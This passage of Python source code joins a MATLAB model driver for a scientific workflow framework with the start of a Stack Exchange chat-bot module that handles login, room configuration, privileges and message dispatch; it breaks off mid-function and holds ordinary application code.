def poll(self, *args, **kwargs):
r"""Fake poll."""
return self.returncode
@property
def stdout_line(self):
r"""str: Output to stdout from function call."""
if self._stdout_line is None:
if self.stdout is not None:
line = self.stdout.getvalue()
if line:
self._stdout_line = line
return self._stdout_line
@property
def stderr_line(self):
r"""str: Output to stderr from function call."""
if self._stderr_line is None:
if self.stderr is not None:
line = self.stderr.getvalue()
if line:
self._stderr_line = line
return self._stderr_line
def print_output(self):
r"""Print output from stdout and stderr."""
if self.stdout_line:
self.print_encoded(self.stdout_line, end="")
if self.stderr_line:
self.print_encoded(self.stderr_line, end="")
def start(self):
r"""Start asychronous call."""
self.future = self.target(*self.args, **self.kwargs)
def is_started(self):
r"""bool: Has start been called."""
return (self.future is not None)
def is_cancelled(self):
r"""bool: Was the async call cancelled or not."""
if self.is_started():
try:
return self.future.cancelled()
except matlab.engine.EngineError:
self.on_matlab_error()
return True
except BaseException:
return True
return False
def is_done(self):
r"""bool: Is the async call still running."""
if self.is_started():
try:
return self.future.done() or self.is_cancelled()
except matlab.engine.EngineError:
self.on_matlab_error()
return True
except BaseException:
return True
return False
def is_alive(self):
r"""bool: Is the async call funning."""
if self.is_started():
return (not self.is_done())
return False
@property
def returncode(self):
r"""int: Return code."""
if self.is_done():
if self.stderr_line: # or self.is_cancelled():
return -1
else:
return 0
else:
return self._returncode
def kill(self, *args, **kwargs):
r"""Cancel the async call."""
if self.is_alive():
try:
out = self.future.cancel()
self.debug("Result of cancelling Matlab call?: %s", out)
except matlab.engine.EngineError as e:
self.debug('Matlab Engine Error: %s' % e)
self.on_matlab_error()
except BaseException as e:
self.debug('Other error on kill: %s' % e)
self.print_output()
if self.is_alive():
self.info('Error killing Matlab script.')
self.matlab_engine.quit()
self.future = None
self._returncode = -1
assert(not self.is_alive())
def on_matlab_error(self):
r"""Actions performed on error in Matlab engine."""
# self.print_output()
self.debug('')
if self.matlab_engine is not None:
try:
self.matlab_engine.eval('exception = MException.last;', nargout=0)
self.matlab_engine.eval('getReport(exception)')
except matlab.engine.EngineError:
pass
class MatlabModelDriver(InterpretedModelDriver): # pragma: matlab
r"""Base class for running Matlab models.
Args:
name (str): Driver name.
args (str or list): Argument(s) for running the model in matlab.
Generally, this should be the full path to a Matlab script.
use_symunit (bool, optional): If True, input/output variables with
units will be represented in Matlab using symunit. Defaults to
False.
**kwargs: Additional keyword arguments are passed to parent class's
__init__ method.
Attributes:
started_matlab (bool): True if the driver had to start a new matlab
engine. False otherwise.
screen_session (str): Screen session that Matlab was started in.
mlengine (object): Matlab engine used to run script.
mlsession (str): Name of the Matlab session that was started.
Raises:
RuntimeError: If Matlab is not installed.
.. note:: Matlab models that call exit will shut down the shared engine.
"""
_schema_subtype_description = ('Model is written in Matlab.')
_schema_properties = {
'use_symunit': {'type': 'boolean', 'default': False}}
language = 'matlab'
language_ext = '.m'
base_languages = ['python']
default_interpreter_flags = ['-nodisplay', '-nosplash', '-nodesktop',
'-nojvm', '-r']
version_flags = ["fprintf('R%s', version('-release')); exit();"]
path_env_variable = 'MATLABPATH'
comm_linger = (os.environ.get('YGG_MATLAB_ENGINE', '').lower() == 'true')
send_converters = {'pandas': serialize.consolidate_array,
'table': serialize.consolidate_array}
recv_converters = {'pandas': 'array'}
type_map = {
'int': 'intX',
'float': 'single, double',
'string': 'char',
'array': 'cell',
'object': 'containers.Map',
'boolean': 'logical',
'null': 'NaN',
'uint': 'uintX',
'complex': 'complex',
'bytes': 'char (utf-8)',
'unicode': 'char',
'1darray': 'mat',
'ndarray': 'mat',
'ply': 'containers.Map',
'obj': 'containers.Map',
'schema': 'containers.Map'}
function_param = {
'istype': 'isa({variable}, \'{type}\')',
'len': 'length({variable})',
'index': '{variable}{{{index}}}',
'first_index': 1,
'python_interface': ('{channel} = YggInterface(\'{python_interface}\', '
'\'{channel_name}\');'),
'python_interface_format': ('{channel} = YggInterface('
'\'{python_interface}\', '
'\'{channel_name}\', '
'\'{format_str}\');'),
'input': '{channel} = YggInterface(\'YggInput\', \'{channel_name}\');',
'output': '{channel} = YggInterface(\'YggOutput\', \'{channel_name}\');',
'recv_function': '{channel}.recv',
'send_function': '{channel}.send',
'multiple_outputs': '[{outputs}]',
'eol': ';',
'comment': '%',
'true': 'true',
'false': 'false',
'not': 'not',
'and': '&&',
'indent': 2 * ' ',
'quote': '\'',
'print_generic': 'disp({object});',
'print': 'disp(\'{message}\');',
'fprintf': 'fprintf(\'{message}\', {variables});',
'error': 'error(\'{error_msg}\');',
'block_end': 'end',
'line_end': ';',
'if_begin': 'if ({cond})',
'if_elif': 'elseif ({cond})',
'if_else': 'else',
'for_begin': 'for {iter_var} = {iter_begin}:{iter_end}',
'while_begin': 'while ({cond})',
'break': 'break;',
'try_begin': 'try',
'try_except': 'catch {error_var}',
'assign': '{name} = {value};',
'expand_mult': '{name} = {value}{{:}};',
'functions_defined_last': True,
'function_def_begin': 'function {output_var} = {function_name}({input_var})',
'function_def_regex': (
r'function *(\[ *)?(?P<outputs>.*?)(?(1)\]) *'
r'= *{function_name} *\((?P<inputs>(?:.|\n)*?)\)\n'
r'(?:(?P<body>'
r'(?:\s*if(?:.*?\n?)*?end;?)|'
r'(?:\s*for(?:.*?\n?)*?end;?)|'
r'(?:\s*parfor(?:.*?\n?)*?end;?)|'
r'(?:\s*switch(?:.*?\n?)*?end;?)|'
r'(?:\s*try(?:.*?\n?)*?end;?)|'
r'(?:\s*while(?:.*?\n?)*?end;?)|'
r'(?:\s*arguments(?:.*?\n?)*?end;?)|'
r'(?:(?:.*?\n?)*?)'
r')'
r'(?:\s*end;?))?'),
'inputs_def_regex': (
r'\s*(?P<name>.+?)\s*(?:(?:,(?: *... *\n)?)|$)'),
'outputs_def_regex': (
r'\s*(?P<name>.+?)\s*(?:,|$)')}
def __init__(self, name, args, **kwargs):
self.using_matlab_engine = _matlab_engine_installed
if self.using_matlab_engine:
kwargs['skip_interpreter'] = True
self.model_wrapper = None
# -batch command line option introduced in 2019
if (self.is_installed()):
if (((self.language_version().lower() >= 'r2019')
and ('-r' in self.default_interpreter_flags))):
self.default_interpreter_flags[
self.default_interpreter_flags.index('-r')] = '-batch'
super(MatlabModelDriver, self).__init__(name, args, **kwargs)
self.started_matlab = False
self.screen_session = None
self.mlengine = None
self.mlsession = None
self.mlprocess = None
@staticmethod
def after_registration(cls, **kwargs):
r"""Operations that should be performed to modify class attributes after
registration. For compiled languages this includes selecting the
default compiler. The order of precedence is the config file 'compiler'
option for the language, followed by the environment variable set by
_compiler_env, followed by the existing class attribute.
"""
if platform._is_mac:
cls._executable_search_dirs = [
os.path.join(x, 'bin') for x in
glob.glob('/Applications/MATLAB*')]
InterpretedModelDriver.after_registration(cls, **kwargs)
def parse_arguments(self, args):
r"""Sort model arguments to determine which one is the executable
and which ones are arguments.
Args:
args (list): List of arguments provided.
"""
super(MatlabModelDriver, self).parse_arguments(args)
model_base, model_ext = os.path.splitext(os.path.basename(self.model_file))
wrap_base = 'wrapped_%s_%s' % (model_base, self.uuid.replace('-', '_'))
# Matlab has a variable name limit of 62
wrap_base = wrap_base[:min(len(wrap_base), 60)]
self.model_wrapper = os.path.join(self.model_dir, wrap_base + model_ext)
self.wrapper_products.append(self.model_wrapper)
@classmethod
def write_error_wrapper(cls, fname, try_lines, env=None,
matlab_engine=None):
r"""Write a wrapper for the model that encloses it in a try except so
that the error can be propagated appropriately.
Args:
fname (str): File where the wrapper should be written.
try_lines (list): List of lines to go in the try block.
model_file (str): Path to model that should be wrapped.
env (dict, optional): Dictionary of environment variables
that should be set before calling the model. Defaults
to None and is ignored.
matlab_engine (MatlabEngine, optional): Matlab engine that will be
used to call the wrapper. If not provided, it is assumed the
error will be called using the Matlab interpreter on the command
line. Defautls to None.
Raises:
"""
# Add environment variables explicitly
lines = []
if env is not None:
for k, v in env.items():
lines.append('setenv(\'%s\', \'%s\')' % (
k, v.encode("unicode_escape").decode('utf-8')))
# Create lines based on use of engine or not
if matlab_engine is not None:
catch_block = ["error(e.message);"]
else:
catch_block = ["rethrow(e);"]
# catch_block = ["fprintf('MATLAB ERROR:\\n%s\\n', e.message);",
# "disp(e.identifier);",
# "disp(e.stack);",
# "exit(0);"]
lines += cls.write_try_except(try_lines, catch_block)
if matlab_engine is None:
lines.append("exit(0);")
# Write lines
logger.debug('Wrapper:\n\t%s', '\n\t'.join(lines))
if fname is None:
return lines
else:
if os.path.isfile(fname): # pragma: debug
os.remove(fname)
with open(fname, 'w') as fd:
fd.write('\n'.join(lines))
logger.debug("Wrote wrapper to: %s" % fname)
@classmethod
def run_code(cls, lines, **kwargs):
r"""Run code by first writing it as an executable and then calling
the driver.
Args:
lines (list): Lines of code to be wrapped as an executable.
**kwargs: Additional keyword arguments are passed to the
write_executable method.
"""
kwargs.setdefault('process_kwargs', {})
if not kwargs['process_kwargs'].get('dont_wrap_error', False):
lines = cls.write_error_wrapper(
None, lines, env=kwargs.get('env', None),
matlab_engine=kwargs.get('matlab_engine', None))
kwargs['process_kwargs']['dont_wrap_error'] = True
return super(MatlabModelDriver, cls).run_code(lines, **kwargs)
@classmethod
def run_executable(cls, args, dont_wrap_error=False, fname_wrapper=None,
matlab_engine=None, **kwargs):
r"""Run a program using the executable for this language and the
provided arguments.
Args:
args (list): The program that should be run and any arguments
that should be provided to it.
dont_wrap_error (bool, optional): If False, the executable will be
wrapped in a try/catch block to prevent errors from stopping
Matlab shutdown. If True, the command will be executed as is
with the Matlab interpreter. Defaults to False.
fname_wrapper (str, optional): File where wrapper should be saved.
If not provided, one is created. Defaults to None.
matlab_engine (MatlabEngine, optional): Matlab engine that should be
used to run the command. If not provided, the Matlab interpreter
is used instead. Defaults to None.
**kwargs: Additional keyword arguments are passed to
cls.executable_command and tools.popen_nobuffer.
Returns:
str: Output to stdout from the run command.
Raises:
RuntimeError: If the language is not installed.
RuntimeError: If there is an error when running the command.
"""
# Strip file if first argument is a file
if os.path.isfile(args[0]):
kwargs.setdefault('working_dir', os.path.dirname(args[0]))
args = [os.path.splitext(os.path.basename(args[0]))[0]] + args[1:]
# Write wrapper
if (not dont_wrap_error) and (len(args) > 0):
if len(args) == 1:
# TODO: Will this work if there is a function defined in the
# script?
try_block = [args[0]]
if not try_block[0].endswith(';'):
try_block[0] += ';'
else:
# Put quotes around arguments since they would be strings when
# passed from the command line
func_call = "%s('%s'" % (args[0], args[1])
for a in args[2:]:
func_call += (", '%s'" % a)
func_call += ');'
try_block = [func_call]
if fname_wrapper is None:
fname_wrapper = 'wrapper_%s%s' % (str(uuid_gen.uuid4()),
cls.language_ext[0])
fname_wrapper = fname_wrapper.replace('-', '_')
working_dir = kwargs.get('working_dir', kwargs.get('cwd', None))
if working_dir is not None:
fname_wrapper = os.path.join(working_dir, fname_wrapper)
cls.write_error_wrapper(fname_wrapper, try_block,
env=kwargs.get('env', None),
matlab_engine=matlab_engine)
assert(os.path.isfile(fname_wrapper))
args = [os.path.splitext(os.path.basename(fname_wrapper))[0]]
# Call base, catching error to remove temp wrapper
try:
if matlab_engine is None:
kwargs['for_matlab'] = True
out = InterpretedModelDriver.run_executable.__func__(
cls, args, **kwargs)
else:
if kwargs.get('debug_flags', None): # pragma: debug
logger.warn("Debugging via valgrind, strace, etc. disabled "
"for Matlab when using a Matlab shared engine.")
assert(kwargs.get('return_process', False))
# Add environment variables
env = kwargs.get('env', {})
old_env = {}
new_env_str = ''
for k, v in env.items():
old_env[k] = matlab_engine.getenv(k)
matlab_engine.setenv(k, v, nargout=0)
new_env_str += "'%s', %s, " % (k, repr(v))
matlab_engine.eval('new_env = py.dict(pyargs(%s));'
% new_env_str[:-2], nargout=0)
matlab_engine.eval('os.environ.update(new_env);', nargout=0)
# Create matlab process using Matlab engine
out = MatlabProcess(name=args[0] + '.MatlabProcess',
target=getattr(matlab_engine, args[0]),
args=args[1:], matlab_engine=matlab_engine)
out.start()
finally:
if (((not kwargs.get('return_process', False))
and (fname_wrapper is not None))):
os.remove(fname_wrapper)
return out
@classmethod
def language_version(cls, skip_config=False):
r"""Determine the version of this language.
Args:
skip_config (bool, optional): If True, the config option
for the version (if it exists) will be ignored and
the version will be determined fresh.
Returns:
str: Version of compiler/interpreter for this language.
"""
if cls.cfg.has_option(cls.language, 'version') and (not skip_config):
return cls.cfg.get(cls.language, 'version')
return cls.get_matlab_info()[1]
@classmethod
def executable_command(cls, args, **kwargs):
r"""Compose a command for running a program in this language with the
provied arguments. If not already present, the interpreter command and
interpreter flags are prepended to the provided arguments.
Args:
args (list): The program that returned command should run and any
arguments that should be provided to it.
**kwargs: Additional keyword arguments are ignored.
Returns:
list: Arguments composing the command required to run the program
from the command line using the interpreter for this language.
"""
# if kwargs.get('exec_type', 'interpreter') == 'interpreter':
# args = ["\"%s\"" % (' '.join(args))]
return super(MatlabModelDriver, cls).executable_command(args, **kwargs)
@classmethod
def configure(cls, cfg):
r"""Add configuration options for this language. This includes locating
any required external libraries and setting option defaults.
Args:
cfg (YggConfigParser): Config class that options should be set for.
Returns:
list: Section, option, description tuples for options that could not
be set.
"""
out = InterpretedModelDriver.configure.__func__(cls, cfg)
opts = {
'startup_waittime_s': [('The time allowed for a Matlab engine to start'
'before timing out and reporting an error.'),
'10'],
'version': ['The version (release number) of installed Matlab.', ''],
'matlabroot': ['The path to the default installation of matlab.', '']}
if ((cfg.get(cls.language, 'disable', 'False').lower() != 'true'
and (not (cfg.has_option(cls.language, 'matlabroot')
and cfg.has_option(cls.language, 'version'))))):
try:
opts['matlabroot'][1], opts['version'][1] = cls.get_matlab_info()
except RuntimeError: # pragma: no matlab
pass
for k in opts.keys():
if not cfg.has_option(cls.language, k):
if opts[k][1]: # pragma: matlab
cfg.set(cls.language, k, opts[k][1])
else:
out.append((cls.language, k, opts[k][0]))
return out
@classmethod
def get_matlab_info(cls): # pragma: matlab
r"""Determine the root directory where Matlab is installed and the version
that is installed (if Matlab is installed at all). This will fail if Matlab
is not installed, cannot be started, or does not operate as expected.
Returns:
tuple: Matlab root directory and Matlab version string.
Raises:
RuntimeError: If Matlab cannot be started or the root directory or
release cannot be determiend.
"""
mtl_id = '=MATLABROOT='
cmd = ("fprintf('" + mtl_id + "%s" + mtl_id + "R%s" + mtl_id + "'"
+ ",matlabroot,version('-release'));")
mtl_proc = cls.run_executable([cmd])
if mtl_id not in mtl_proc: # pragma: debug
raise RuntimeError(("Could not locate ID string (%s) in "
"output (%s).") % (mtl_id, mtl_proc))
parts = mtl_proc.split(mtl_id)
if len(parts) < 3: # pragma: debug
raise RuntimeError(("Could not get matlabroot/version from "
"output (%s).") % (mtl_proc))
matlabroot = parts[-3]
release = parts[-2]
return matlabroot, release
def start_matlab_engine(self):
r"""Start matlab session and connect to it."""
ml_attr = ['screen_session', 'mlengine', 'mlsession', 'mlprocess']
attempt_connect = (len(matlab.engine.find_matlab()) != 0)
# Connect to matlab if a session exists
if attempt_connect:
for mlsession in matlab.engine.find_matlab():
try:
self.debug("Trying to connect to session %s", mlsession)
self.mlengine = connect_matlab_engine(mlsession)
self.mlsession = mlsession
self.debug("Connected to existing shared engine: %s",
self.mlsession)
break
except matlab.engine.EngineError:
pass
# Start if not running or connect failed
if self.mlengine is None:
if attempt_connect:
self.debug("Starting a matlab shared engine (connect failed)")
else:
self.debug("Starting a matlab shared engine (none existing)")
out = start_matlab_engine()
for i, attr in enumerate(ml_attr):
setattr(self, attr, out[i])
self.started_matlab = True
# Add things to Matlab environment
self.mlengine.addpath(self.model_dir, nargout=0)
self.debug("Connected to matlab session '%s'" % self.mlsession)
def before_start(self):
r"""Actions to perform before the run loop."""
kwargs = dict(fname_wrapper=self.model_wrapper)
if self.using_matlab_engine:
self.start_matlab_engine()
kwargs.update(matlab_engine=self.mlengine,
no_queue_thread=True)
else:
kwargs.update(working_dir=self.model_dir)
with self.lock:
if self.using_matlab_engine and (self.mlengine is None): # pragma: debug
self.debug('Matlab engine not set. Stopping')
return
super(MatlabModelDriver, self).before_start(**kwargs)
def run_loop(self):
r"""Loop to check if model is still running and forward output."""
if self.using_matlab_engine:
self.model_process.print_output()
self.periodic_debug('matlab loop', period=100)('Looping')
if self.model_process.is_done():
self.model_process.print_output()
self.set_break_flag()
try:
self.model_process.future.result()
self.model_process.print_output()
except matlab.engine.EngineError:
self.model_process.print_output()
except BaseException:
self.model_process.print_output()
self.exception("Error running model.")
else:
self.sleep()
else:
super(MatlabModelDriver, self).run_loop()
def after_loop(self):
r"""Actions to perform after run_loop has finished. Mainly checking
if there was an error and then handling it."""
if self.using_matlab_engine:
if (self.model_process is not None) and self.model_process.is_alive():
self.info("Model process thread still alive")
self.kill_process()
return
super(MatlabModelDriver, self).after_loop()
if self.using_matlab_engine:
with self.lock:
self.cleanup()
def cleanup(self):
r"""Close the Matlab session and engine."""
if self.using_matlab_engine:
try:
stop_matlab_engine(self.screen_session, self.mlengine,
self.mlsession, self.mlprocess,
keep_engine=(not self.started_matlab))
except (SystemError, Exception) as e: # pragma: debug
self.error('Failed to exit matlab engine')
self.raise_error(e)
self.debug('Stopped Matlab')
self.screen_session = None
self.mlsession = None
self.started_matlab = False
self.mlengine = None
self.mlprocess = None
super(MatlabModelDriver, self).cleanup()
def check_exits(self):
r"""Check to make sure the program dosn't contain any exits as exits
will shut down the Matlab engine as well as the program.
Raises:
RuntimeError: If there are any exit calls in the file.
"""
has_exit = False
with open(self.raw_model_file, 'r') as fd:
for i, line in enumerate(fd):
if line.strip().startswith('exit'):
has_exit = True
break
if self.using_matlab_engine and has_exit:
warnings.warn(
"Line %d in '%s' contains an " % (
i, self.raw_model_file)
+ "'exit' call which will exit the MATLAB engine "
+ "such that it cannot be reused. Please replace 'exit' "
+ "with a return or error.")
def set_env(self):
r"""Get environment variables that should be set for the model process.
Returns:
dict: Environment variables for the model process.
"""
out = super(MatlabModelDriver, self).set_env()
if self.use_symunit:
out['YGG_MATLAB_SYMUNIT'] = 'True'
if self.using_matlab_engine:
out['YGG_MATLAB_ENGINE'] = 'True'
# TODO: Move the following to InterpretedModelDriver once another
# language sets path_env_variable
path_list = []
prev_path = out.pop(self.path_env_variable, '')
if prev_path:
path_list.append(prev_path)
if isinstance(self.paths_to_add, list):
for x in self.paths_to_add:
if x not in prev_path:
path_list.append(x)
path_list.append(self.model_dir)
if path_list:
out[self.path_env_variable] = os.pathsep.join(path_list)
return out
@classmethod
def comm_atexit(cls, comm):
r"""Operations performed on comm at exit including draining receive.
Args:
comm (CommBase): Communication object.
"""
if comm.direction == 'recv':
while comm.recv(timeout=0)[0]:
comm.sleep()
else:
comm.send_eof()
comm.linger_close()
@classmethod
def decode_format(cls, format_str):
r"""Method for decoding format strings created in this language.
Args:
format_str (str): Encoded format string.
Returns:
str: Decoded format string.
"""
as_str = False
format_str_bytes = format_str
if isinstance(format_str, str):
as_str = True
format_str_bytes = format_str.encode("utf-8")
out = format_str_bytes.decode('unicode-escape')
if not as_str:
out = out.encode("utf-8")
return out
|
chatcommunicate.py | # coding=utf-8
from chatexchange import events
from chatexchange.browser import LoginError
from chatexchange.messages import Message
from chatexchange_extension import Client
import collections
import itertools
import os
import os.path
import queue
import regex
import requests
import sys
import threading
import time
import yaml
import shlex
import datahandling
import metasmoke
import classes.feedback
from helpers import log
from excepthook import log_exception
from globalvars import GlobalVars
from parsing import fetch_post_id_and_site_from_url, fetch_post_url_from_msg_content, fetch_owner_url_from_msg_content
from tasks import Tasks
from socketscience import SocketScience
LastMessages = collections.namedtuple("LastMessages", ["messages", "reports"])
class RoomData:
def __init__(self, room, block_time, deletion_watcher):
self.room = room
self.block_time = block_time
self.deletion_watcher = deletion_watcher
class CmdException(Exception):
pass
_prefix_commands = {}
_reply_commands = {}
_clients = {
"stackexchange.com": None,
"stackoverflow.com": None,
"meta.stackexchange.com": None
}
_command_rooms = set()
_watcher_rooms = set()
_room_roles = {}
_privileges = {}
_global_block = -1
_rooms = {}
_last_messages = LastMessages({}, collections.OrderedDict())
_msg_queue = queue.Queue()
_pickle_run = threading.Event()
def init(username, password, try_cookies=True):
global _clients
global _rooms
global _room_data
global _last_messages
for site in _clients.keys():
client = Client(site)
logged_in = False
if try_cookies:
if GlobalVars.cookies is None:
datahandling.remove_pickle("cookies.p")
GlobalVars.cookies = {}
else:
cookies = GlobalVars.cookies
try:
if site in cookies and cookies[site] is not None:
client.login_with_cookie(cookies[site])
logged_in = True
log('debug', 'chat.{}: Logged in using cached cookies'.format(site))
except LoginError as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
log('debug', 'chat.{}: Login error {}: {}'.format(site, exc_type.__name__, exc_obj))
log('debug', 'chat.{}: Falling back to credential-based login'.format(site))
del cookies[site]
datahandling.dump_cookies()
if not logged_in:
for retry in range(3):
try:
GlobalVars.cookies[site] = client.login(username, password)
break
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
log('debug', 'chat.{}: Login error {}: {}'.format(site, exc_type.__name__, exc_obj))
else:
raise Exception("Failed to log into " + site + ", max retries exceeded")
_clients[site] = client
if os.path.exists("rooms_custom.yml"):
parse_room_config("rooms_custom.yml")
else:
parse_room_config("rooms.yml")
if not GlobalVars.standby_mode:
join_command_rooms()
if datahandling.has_pickle("messageData.p"):
try:
_last_messages = datahandling.load_pickle("messageData.p")
except EOFError:
pass
threading.Thread(name="pickle ---rick--- runner", target=pickle_last_messages, daemon=True).start()
threading.Thread(name="message sender", target=send_messages, daemon=True).start()
if try_cookies:
datahandling.dump_cookies()
def join_command_rooms():
for site, roomid in _command_rooms:
room = _clients[site].get_room(roomid)
deletion_watcher = (site, roomid) in _watcher_rooms
room.join()
room.watch_socket(on_msg)
_rooms[(site, roomid)] = RoomData(room, -1, deletion_watcher)
def parse_room_config(path):
with open(path, "r", encoding="utf-8") as room_config:
room_dict = yaml.safe_load(room_config.read())
with open("users.yml", "r", encoding="utf-8") as user_config:
user_data = yaml.safe_load(user_config.read())
inherits = []
rooms = {}
host_fields = {'stackexchange.com': 1, 'meta.stackexchange.com': 2, 'stackoverflow.com': 3}
for site, site_rooms in room_dict.items():
for roomid, room in site_rooms.items():
room_identifier = (site, roomid)
# print("Process {}".format(room_identifier))
rooms[room_identifier] = room
if "privileges" in room and "inherit" in room["privileges"]:
inherits.append({'from': (room["privileges"]["inherit"]["site"],
room["privileges"]["inherit"]["room"]), 'to': room_identifier})
if "additional" in room["privileges"]:
_privileges[room_identifier] =\
set([user_data[x][host_fields[site]] for x in room["privileges"]["additional"]])
elif "privileges" in room:
_privileges[room_identifier] = set([user_data[x][host_fields[site]] for x in room["privileges"]])
else:
_privileges[room_identifier] = set()
if "commands" in room and room["commands"]:
_command_rooms.add(room_identifier)
if "watcher" in room and room["watcher"]:
_watcher_rooms.add(room_identifier)
if "msg_types" in room:
add_room(room_identifier, room["msg_types"])
for inherit in inherits:
if inherit["from"] in rooms:
from_privs = _privileges[inherit["from"]]
from_accounts = [k for k, v in user_data.items() if v[host_fields[inherit["from"][0]]] in from_privs]
inherit_from = set([user_data[x][host_fields[inherit["to"][0]]] for x in from_accounts])
if inherit["to"] in _privileges:
before = _privileges[inherit["to"]]
_privileges[inherit["to"]] = _privileges[inherit["to"]] | inherit_from
# log('debug', '{} inheriting privs from {} with additional: before {}, after {}'.format(
# inherit["to"], inherit["from"], before, _privileges[inherit["to"]]))
else:
_privileges[inherit["to"]] = inherit_from
else:
log('warn', 'Room {} on {} specified privilege inheritance from {}, but no such room exists'.format(
inherit["to"][1], inherit["to"][1], inherit["from"][1]))
def add_room(room, roles):
for role in roles:
if role not in _room_roles:
_room_roles[role] = set()
_room_roles[role].add(room)
def pickle_last_messages():
while True:
_pickle_run.wait()
_pickle_run.clear()
datahandling.dump_pickle("messageData.p", _last_messages)
def send_messages():
while True:
room, msg, report_data = _msg_queue.get()
if len(msg) > 500 and "\n" not in msg:
log('warn', 'Discarded the following message because it was over 500 characters')
log('warn', msg)
_msg_queue.task_done()
continue
full_retries = 0
while full_retries < 3:
try:
response = room.room._client._do_action_despite_throttling(("send", room.room.id, msg)).json()
if "id" in response:
identifier = (room.room._client.host, room.room.id)
message_id = response["id"]
if identifier not in _last_messages.messages:
_last_messages.messages[identifier] = collections.deque((message_id,))
else:
last = _last_messages.messages[identifier]
if len(last) > 100:
last.popleft()
last.append(message_id)
if report_data:
_last_messages.reports[(room.room._client.host, message_id)] = report_data
if len(_last_messages.reports) > 50:
_last_messages.reports.popitem(last=False)
if room.deletion_watcher:
callback = room.room._client.get_message(message_id).delete
GlobalVars.deletion_watcher.subscribe(report_data[0], callback=callback, timeout=120)
_pickle_run.set()
break
except requests.exceptions.HTTPError:
full_retries += 1
_msg_queue.task_done()
def on_msg(msg, client):
global _room_roles
if not isinstance(msg, events.MessagePosted) and not isinstance(msg, events.MessageEdited):
return
message = msg.message
room_ident = (client.host, message.room.id)
room_data = _rooms[room_ident]
if message.owner.id == client._br.user_id:
if 'direct' in _room_roles and room_ident in _room_roles['direct']:
SocketScience.receive(message.content_source.replace("\u200B", "").replace("\u200C", ""))
return
if message.content.startswith("<div class='partial'>"):
message.content = message.content[21:]
if message.content.endswith("</div>"):
message.content = message.content[:-6]
if message.parent:
try:
if message.parent.owner.id == client._br.user_id:
strip_mention = regex.sub("^(<span class=(\"|')mention(\"|')>)?@.*?(</span>)? ", "", message.content)
cmd = GlobalVars.parser.unescape(strip_mention)
result = dispatch_reply_command(message.parent, message, cmd)
if result:
s = ":{}\n{}" if "\n" not in result and len(result) >= 488 else ":{} {}"
_msg_queue.put((room_data, s.format(message.id, result), None))
except ValueError:
pass
elif message.content.lower().startswith("sd "):
result = dispatch_shorthand_command(message)
if result:
s = ":{}\n{}" if "\n" not in result and len(result) >= 488 else ":{} {}"
_msg_queue.put((room_data, s.format(message.id, result), None))
elif message.content.startswith("!!/") or message.content.lower().startswith("sdc "):
result = dispatch_command(message)
if result:
s = ":{}\n{}" if "\n" not in result and len(result) >= 488 else ":{} {}"
_msg_queue.put((room_data, s.format(message.id, result), None))
elif classes.feedback.FEEDBACK_REGEX.search(message.content) \
and is_privileged(message.owner, message.room) and datahandling.last_feedbacked:
ids, expires_in = datahandling.last_feedbacked
if time.time() < expires_in:
Tasks.do(metasmoke.Metasmoke.post_auto_comment, message.content_source, message.owner, ids=ids)
elif 'direct' in _room_roles and room_ident in _room_roles['direct']:
SocketScience.receive(message.content_source.replace("\u200B", "").replace("\u200C", ""))
def tell_rooms_with(prop, msg, notify_site="", report_data=None):
tell_rooms(msg, (prop,), (), notify_site=notify_site, report_data=report_data)
def tell_rooms_without(prop, msg, notify_site="", report_data=None):
tell_rooms(msg, (), (prop,), notify_site=notify_site, report_data=report_data)
def tell_rooms(msg, has, hasnt, notify_site="", report_data=None):
global _rooms
msg = msg.rstrip()
target_rooms = set()
# Go through the list of properties in "has" and add all rooms which have any of those properties
# to the target_rooms set. _room_roles contains a list of rooms for each property.
for prop_has in has:
if isinstance(prop_has, tuple):
# If the current prop_has is a tuple, then it's assumed to be a descriptor of a specific room.
# The format is: (_client.host, room.id)
target_rooms.add(prop_has)
if prop_has not in _room_roles:
# No rooms have this property.
continue
for room in _room_roles[prop_has]:
if all(map(lambda prop: prop not in _room_roles or room not in _room_roles[prop], hasnt)):
if room not in _rooms:
# If SD is not already in the room, then join the room.
site, roomid = room
deletion_watcher = room in _watcher_rooms
new_room = _clients[site].get_room(roomid)
new_room.join()
_rooms[room] = RoomData(new_room, -1, deletion_watcher)
target_rooms.add(room)
for room_id in target_rooms:
room = _rooms[room_id]
if notify_site:
pings = datahandling.get_user_names_on_notification_list(room.room._client.host,
room.room.id,
notify_site,
room.room._client)
msg_pings = datahandling.append_pings(msg, pings)
else:
msg_pings = msg
timestamp = time.time()
if room.block_time < timestamp and _global_block < timestamp:
if report_data and "delay" in _room_roles and room_id in _room_roles["delay"]:
def callback(room=room, msg=msg_pings):
post = fetch_post_id_and_site_from_url(report_data[0])[0:2]
if not datahandling.is_false_positive(post) and not datahandling.is_ignored_post(post):
_msg_queue.put((room, msg, report_data))
task = Tasks.later(callback, after=300)
GlobalVars.deletion_watcher.subscribe(report_data[0], callback=task.cancel)
else:
_msg_queue.put((room, msg_pings, report_data))
def get_last_messages(room, count):
identifier = (room._client.host, room.id)
if identifier not in _last_messages.messages:
return
for msg_id in itertools.islice(reversed(_last_messages.messages[identifier]), count):
yield room._client.get_message(msg_id)
def get_report_data(message):
identifier = (message._client.host, message.id)
if identifier in _last_messages.reports:
return _last_messages.reports[identifier]
else:
post_url = fetch_post_url_from_msg_content(message.content_source)
if post_url:
return (post_url, fetch_owner_url_from_msg_content(message.content_source))
def is_privileged(user, room):
# print(_privileges)
return user.id in _privileges[(room._client.host, room.id)] or user.is_moderator
def block_room(room_id, site, time):
global _global_block
if room_id is None:
_global_block = time
else:
_rooms[(site, room_id)].block_time = time
class ChatCommand:
def __init__(self, type_signature, reply=False, whole_msg=False, privileged=False,
arity=None, aliases=None, give_name=False):
self.type_signature = type_signature
self.reply = reply
self.whole_msg = whole_msg
self.privileged = privileged
self.arity = arity
self.aliases = aliases or []
self.give_name = give_name
self.__func__ = None
def __call__(self, *args, original_msg=None, alias_used=None, quiet_action=False):
disable_key = "no-" + self.__func__.__name__
try:
room_identifier = (original_msg.room._client.host, original_msg.room.id)
if disable_key in _room_roles and room_identifier in _room_roles[disable_key]:
return "This command is disabled in this room"
except AttributeError:
# Test cases in CI don't contain enough data
pass
if self.privileged and not is_privileged(original_msg.owner, original_msg.room):
return GlobalVars.not_privileged_warning
if self.whole_msg:
processed_args = [original_msg]
else:
processed_args = []
try:
try:
processed_args.extend(
[(coerce(arg) if arg else arg) for coerce, arg in zip(self.type_signature, args)])
except ValueError as e:
return "Invalid input type given for an argument"
if self.give_name:
result = self.__func__(*processed_args, alias_used=alias_used)
else:
